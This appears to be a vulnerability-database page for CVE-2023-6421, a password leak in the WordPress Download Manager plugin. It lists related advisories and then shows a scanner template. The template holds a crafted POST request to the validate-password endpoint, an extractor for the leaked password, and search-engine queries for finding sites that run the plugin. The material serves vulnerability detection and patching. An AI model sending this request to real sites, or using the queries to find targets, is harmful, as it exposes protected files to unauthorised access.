| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for Insufficiently Protected Credentials in W3Eden Download_Manager | 9 Oct 202413:18 | – | githubexploit | |
| CVE-2023-6421 | 1 Jan 202416:26 | – | circl | |
| WordPress Plugin Download Manager Security Vulnerability | 1 Jan 202400:00 | – | cnnvd | |
| CVE-2023-6421 | 1 Jan 202414:18 | – | cve | |
| CVE-2023-6421 Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak | 1 Jan 202414:18 | – | cvelist | |
| CVE-2023-6421 | 1 Jan 202415:15 | – | nvd | |
| CVE-2023-6421 | 1 Jan 202415:15 | – | osv | |
| Default credentials | 1 Jan 202415:15 | – | prion | |
| PT-2024-14953 · WordPress · Download Manager | 1 Jan 202400:00 | – | ptsecurity | |
| CVE-2023-6421 Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak | 1 Jan 202414:18 | – | vulnrichment |
id: CVE-2023-6421
info:
name: WordPress Download Manager - File Password Exposure
author: ritikchaddha
severity: medium
description: |
The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.
impact: |
Unauthenticated attackers can obtain passwords for password-protected downloads by sending crafted requests to the validate-password API endpoint.
remediation: |
Update the WordPress Download Manager plugin to the latest version.
reference:
- https://wpscan.com/vulnerability/244c7c00-fc8d-4a73-bbe0-7865c621d410/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-6421
cwe-id: CWE-200
epss-score: 0.02437
epss-percentile: 0.82308
metadata:
verified: true
max-request: 1
fofa-query: body="wp-content/plugins/download-manager/"
google-query: inurl:"/wp-content/plugins/download-manager/"
shodan-query: html:"wp-content/plugins/download-manager/"
tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager,vuln
http:
- raw:
- |
POST /index.php?rest_route=/wpdm/validate-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__wpdm_ID={{id}}&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322
# pass the password protected file id in the 'id' parameter `-V id=123`
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success"'
- 'op":"'
- 'Wrong Password'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: json
name: password
json:
- ".op"
# digest: 4a0a0047304502206b7a7d6ef7ff737692a2782ae7f56019f8ee237f6a88526c7de0b0c6f1b3e916022100d374ff9bcfa8949881b9062a74abb46bac304cc21539eed454f7e92f22b98342:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation